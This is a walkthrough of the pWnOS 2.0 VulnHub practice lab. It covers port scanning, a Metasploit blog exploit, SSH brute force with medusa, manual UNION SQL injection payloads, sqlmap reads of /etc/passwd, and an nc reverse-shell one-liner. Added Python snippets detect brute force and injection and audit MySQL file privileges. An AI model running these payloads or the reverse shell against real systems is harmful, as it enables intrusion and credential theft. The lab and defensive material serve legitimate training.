Introduction
Series: pWnOS (2 machines in this series)
Release date: July 4, 2011
Difficulty: Medium
Operating environment: VMware Workstation
Objective: Obtain root privileges
Note: The target machine has a static IP, so the VM network adapter needs to be placed on the 10.10.10.0 network
Learning points:
- Host discovery
- Port scanning and vulnerability scanning
- CMS exploitation
- Reading and writing files through SQL
- Privilege escalation via leaked sensitive information
Target address: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
Information gathering
The target machine is known to have a static IP: 10.10.10.100
nmap -p- 10.10.10.100
nmap -p22,80 -A 10.10.10.100
nmap -p22,80 --script=vuln 10.10.10.100
Web enumeration
The site opens to a login page; first look at the directory that nmap found
I could not identify which CMS it is by searching directly
It was identified by searching through the page source code
Vulnerability discovery
Running the public exploit by hand failed. Searching online suggests it only needs some dependency installed, but I did not bother and used msf instead
The module appears to create an account and then upload a PHP backdoor to obtain a session
search Simple PHP Blog 0.4.0
use 0
set rhosts 10.10.10.100
set URI /blog
exploit
Privilege escalation
Search for database configuration files
A database configuration file is found, but the database cannot be connected to, which means the password is wrong. How to solve this?
I searched the system for files with the same name, found another copy, and connected to the database successfully. Since "ch16" was mentioned in the leaked sensitive files, I queried that user's record and recovered the password through an online lookup site: killerbeesareflying
SSH brute force
Now that I have several passwords, rather than try them one by one I brute-forced directly. Unexpectedly, the target's SSH algorithms are rather old and hydra cannot connect, so another tool had to be used. The root password obtained by brute force is: root@ISIntS
medusa -M ssh -h 10.10.10.100 -U ./username -P ./pass | grep SUCCESS
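From the defender's side, as an added example that is not part of the write-up: a Python detector that parses sshd lines from auth.log and alerts on the burst of failed logins a password-guessing run like the medusa command above leaves behind, noting whether an accepted login from the same host followed. The log lines are constructed sample data; the hostname and PIDs are placeholders.

```python
import re
from datetime import datetime
# sshd password-authentication lines in auth.log syslog format (no year in the stamp).
LINE_RX = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)
# Constructed sample log: a guessing burst that ends in an accepted root login,
# plus a single typo from a legitimate user on another host.
SAMPLE_LOG = [
    "Jul 14 21:03:01 web sshd[2101]: Failed password for root from 10.10.10.128 port 40110 ssh2",
    "Jul 14 21:03:02 web sshd[2103]: Failed password for root from 10.10.10.128 port 40112 ssh2",
    "Jul 14 21:03:02 web sshd[2105]: Failed password for invalid user admin from 10.10.10.128 port 40114 ssh2",
    "Jul 14 21:03:03 web sshd[2107]: Failed password for ch16 from 10.10.10.128 port 40116 ssh2",
    "Jul 14 21:03:04 web sshd[2109]: Failed password for root from 10.10.10.128 port 40118 ssh2",
    "Jul 14 21:03:05 web sshd[2111]: Failed password for root from 10.10.10.128 port 40120 ssh2",
    "Jul 14 21:03:06 web sshd[2113]: Accepted password for root from 10.10.10.128 port 40122 ssh2",
    "Jul 14 21:10:40 web sshd[2200]: Failed password for ch16 from 10.10.10.50 port 51000 ssh2",
]

def parse_auth_log(lines, year=2011):
    """Return (timestamp, ip, user, result) for each sshd password event."""
    events = []
    for line in lines:
        m = LINE_RX.match(line)
        if m:  # pam_unix, disconnect and other noise lines are ignored
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"]))
    return events

def detect_bruteforce(events, threshold=5, window_s=60):
    """Alert per source IP on >= threshold failures within window_s seconds;
    'compromised' lists accounts accepted from that IP after the burst began."""
    by_ip = {}
    for ev in events:
        by_ip.setdefault(ev[1], []).append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e[3] == "Failed"]
        for start in fails:
            burst = [e for e in fails if 0 <= (e[0] - start[0]).total_seconds() <= window_s]
            if len(burst) >= threshold:
                ok = [e[2] for e in evs if e[3] == "Accepted" and e[0] >= start[0]]
                alerts[ip] = {"failures": len(burst), "compromised": ok,
                              "users": sorted({e[2] for e in burst})}
                break
    return alerts

if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_auth_log(SAMPLE_LOG)).items():
        print(ip, info)
```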
Second approach
Web enumeration
Entering a single quotation mark in the username field of the login page causes an error, so why not use sqlmap?
SQL injection (manual)
order by
Determine the number of columns in the current table
8 works normally while other numbers error out, so the table has 8 columns
union select
Check which column's data is displayed on the page: column 4 is displayed
- Query the database version and the current database name
- Get the table names; there is only one table: users
email=' union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--+&pass=1&submit=Login&submitted=TRUE
- View the column names of the table users
email=' union select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='users'-- &pass=1&submit=Login&submitted=TRUE
- Get the data in the specified column
email=' union select 1,2,3,group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,email,0x3a,pass,0x3a,user_level,0x3a),5,6,7,8 from users-- &pass=1&submit=Login&submitted=TRUE
SQL injection (sqlmap)
SQL injection is confirmed. Although sqlmap did not crack the password hash, an online lookup site gives the password: killerbeesareflying
sqlmap -r 1.txt --dbs --dump
POST /login.php HTTP/1.1
Host: 10.10.10.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://10.10.10.100
Connection: close
Referer: http://10.10.10.100/login.php
Cookie: PHPSESSID=0ur4mnc22qt9ue1d0dvu857v74
Upgrade-Insecure-Requests: 1
email=%27&pass=1&submit=Login&submitted=TRUE
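An added example, not from the write-up: a Python triage function that URL-decodes login POST bodies such as the one in 1.txt above and flags the payload shapes used in this section (single-quote probe, ORDER BY column counting, UNION SELECT against information_schema, trailing SQL comment). The sample bodies reuse the write-up's probe and table-name payload; the benign login is constructed.

```python
import re
from urllib.parse import parse_qs

# Signals for the UNION-based probing shown above: ORDER BY column counting,
# UNION SELECT against information_schema, and a trailing SQL comment ("-- ",
# or "--+" which decodes to "-- ") that discards the rest of the WHERE clause.
SIGNALS = {
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "comment_terminator": re.compile(r"--(\s|$)|/\*"),
}
SEVERITY = {"union_select": 3, "schema_enum": 3, "order_by_probe": 2,
            "comment_terminator": 2, "unbalanced_quote": 1}
LABELS = {1: "low", 2: "medium", 3: "high"}

def analyze_body(body):
    """Decode an application/x-www-form-urlencoded POST body and report, per
    parameter, which injection signals its decoded value carries."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = [tag for tag, rx in SIGNALS.items() if rx.search(value)]
            # An odd number of single quotes breaks out of a quoted literal; on
            # its own this is weak evidence (a name like O'Brien also trips it).
            if value.count("'") % 2 == 1:
                hits.append("unbalanced_quote")
            if hits:
                worst = max(SEVERITY[h] for h in hits)
                findings[name] = {"signals": sorted(hits), "severity": LABELS[worst]}
    return findings

def scan_bodies(bodies):
    """Return (index, findings) for each body that carries at least one signal."""
    return [(i, f) for i, f in enumerate(map(analyze_body, bodies)) if f]

# Sample bodies: the single-quote probe and the table-name payload from the
# write-up, plus one constructed benign login that should stay quiet.
SAMPLE_BODIES = [
    "email=%27&pass=1&submit=Login&submitted=TRUE",
    "email=' union select 1,2,3,group_concat(table_name),5,6,7,8 from "
    "information_schema.tables where table_schema=database()--+"
    "&pass=1&submit=Login&submitted=TRUE",
    "email=user%40example.com&pass=Secret1&submit=Login&submitted=TRUE",
]

if __name__ == "__main__":
    for idx, findings in scan_bodies(SAMPLE_BODIES):
        print(idx, findings)
```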
Read file
Tested it: files can be read
sqlmap -r 1.txt -v 1 --file-read="/etc/passwd"
Writing a file at this point is a bit awkward, since I was not sure whether the target's web root is /var/www, so I tried reading /var/www/index.php, which confirmed the website directory.
Write file
The way the file gets written is a bit flawed, so I worked around it; it does not affect getting a shell anyway
Testing showed that the target's nc cannot spawn a shell directly; the command placed in the URL is as follows, and a shell is obtained successfully
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.128 4444 >/tmp/f
Here is how sqlmap writes files. Strangely, I could not even write into the tmp directory.
sqlmap -r 1.txt --file-write ./1.php --file-dest /tmp/123456.php
Searching directly on the target machine, the uploaded file cannot be found.
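Why --file-read worked and what to check for: an added Python audit (not from the write-up) of the two MySQL settings that govern LOAD_FILE() and SELECT ... INTO OUTFILE/DUMPFILE, the secure_file_priv option in my.cnf and which accounts hold the global FILE privilege (by name or via ALL PRIVILEGES on *.*). The my.cnf fragment and SHOW GRANTS lines are constructed samples with placeholder account names; an absent or empty secure_file_priv is treated as unrestricted, which was the MySQL default before 5.7.6.

```python
import re

# Constructed sample inputs (placeholder names, not from the write-up): a my.cnf
# fragment and lines as printed by SHOW GRANTS FOR <account>.
SAMPLE_MYCNF = """
[mysqld]
datadir = /var/lib/mysql
# secure_file_priv = /var/lib/mysql-files   <- commented out, so no restriction
"""
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'localhost' IDENTIFIED BY PASSWORD '<hash>'",
    "GRANT SELECT, INSERT, UPDATE, FILE ON *.* TO 'report'@'%'",
    "GRANT SELECT, INSERT, UPDATE ON `blog`.* TO 'blog'@'localhost'",
]

OPTION_RX = re.compile(r"^\s*secure[_-]file[_-]priv\s*=\s*(.*?)\s*$")
# FILE is a global privilege, so it can only be granted ON *.*, either by name
# or as part of ALL PRIVILEGES.
FILE_GRANT_RX = re.compile(r"^GRANT (?:ALL PRIVILEGES|.*\bFILE\b.*) ON \*\.\* TO (\S+@\S+)", re.I)

def secure_file_priv_status(mycnf_text):
    """'disabled' for NULL, 'restricted:<dir>' for a directory, otherwise
    'unrestricted' (option absent, commented out, or set to an empty string)."""
    for line in mycnf_text.splitlines():
        m = OPTION_RX.match(line)
        if m:
            value = m.group(1).strip("\"'")
            if value.upper() == "NULL":
                return "disabled"
            return f"restricted:{value}" if value else "unrestricted"
    return "unrestricted"

def accounts_with_file_privilege(grant_lines):
    """Accounts that can read/write server files via SQL (LOAD_FILE, OUTFILE)."""
    return [m.group(1) for m in map(FILE_GRANT_RX.match, grant_lines) if m]

def audit(mycnf_text, grant_lines):
    """Combine both checks: file read/write from SQL needs a FILE-capable
    account AND a secure_file_priv that does not block the target path."""
    status = secure_file_priv_status(mycnf_text)
    accounts = accounts_with_file_privilege(grant_lines)
    return {"secure_file_priv": status, "file_accounts": accounts,
            "exposed": status == "unrestricted" and bool(accounts)}

if __name__ == "__main__":
    print(audit(SAMPLE_MYCNF, SAMPLE_GRANTS))
```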
Privilege escalation
The privilege escalation is the same as in the first approach, so it is not repeated here.
References
- Zero Basics of Hacking, Chapter 3: Web Vulnerabilities in Action - SQL Injection
- pWnOS: 2.0